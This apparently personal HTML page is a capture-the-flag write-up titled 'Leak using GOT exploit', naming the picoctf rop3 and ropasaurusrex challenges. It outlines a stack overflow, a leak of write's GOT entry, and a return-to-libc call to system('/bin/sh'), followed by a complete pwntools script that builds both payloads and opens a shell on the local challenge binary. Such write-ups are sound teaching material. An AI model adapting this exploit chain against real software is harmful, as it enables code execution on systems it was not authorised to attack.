<html>
 <head>
<title> GOT-01 </title>

 <link rel="stylesheet" type="text/css" href="test1.css" />
 <link rel="stylesheet" type="text/css" href="fonts.css" />
</head>
<style>

      body {background-color:white;
	border-bottom:1px solid #bfbfbf
         line-height:1.5em;
	color:#222}
 
   p{color:black;
        /*font-style: italic;
       font-family: "Times New Roman";*/
      letter-spacing: 2px;
       font-size: 20px;
       margin-top: 10px;
       margin-bottom: 10px;
        margin-right: 150px;
       margin-left: 150px; 
       }



    h1{ color:black;
         font-style: italic;
        font-size:2.2em;
	font-family:"PT Serif","Georgia","Helvetica Neue",Arial,sans-serif;
	font-weight:normal;
	line-height:1.2em;
	margin-bottom:0.6667em
        margin-right: 150px;
       margin-left: 150px;}

code { 
display: block; white-space: pre-wrap; 
border: 1px solid #000; 
padding: 10px; 
line-height: 1.5em; 
font-family: "Lucida Console", Monaco, monospace; 
} 
.code-str 
{ color:#ff33d4; } 
 .code-comment { color:#3c33ff; } 
 .code-key { color:#9933ff; }
 .code-brown{color:#ba4a00} 


</style>
<body>

<script src="null.js"></script>

<div style="position: relative; background: url('http://hackerbuck.net23.net/css/bgm.png'); width: 1210px; height: 110px;">
 <div style="position: absolute; bottom: 0; left: 0.5em; width: 400px; font-weight: bold; color: #fff;">
 <p style="color:white;font-size:2.2em;"> GOT-01 </p>
 </div>
 </div>


 <br> <br>  <br>          

<h1 class="post-title"> Leak using GOT exploit .. </h1>
   
 <br> 

<p>  OK this one was quite interesting exploit , it was too got exploit only but it's different & the exploit goes like this <br>
     1.) Oveflow until you reach eip <br>
     2.) Now use write function to leak the value @ got Table so that we can calculate system and '/bin/sh' address <br>
     3.) Now again trigger the vulnerable func again and then now use r2libc attack :)  </p>
<p><b> I used this to solve rop3 in picoctf && ropasaurusrex </b></p>


<br><br>  

<code> 

from pwn import *

write_plt=0x0804830c
vuln=0x08048426
write_got=0x08049614
system_offset=0x9e630
bin_offset=0x85e4b
payload="A"*140+pack(write_plt)+pack(vuln)+pack(1)+pack(write_got)+pack(4)

p=process("ropasaurusrex")


p.sendline(payload)

a=p.recv(4)

a=u32(a)

print "[+] Leaked Address"
print hex(a)

print "[+] Target address"

system=a-system_offset

print hex(system)
binaddr=a+bin_offset
payload="A"*140+pack(system)+pack(0xdeadbeef)+pack(binaddr)
p.sendline(payload)
p.interactive()


 </code>

</body>
</html>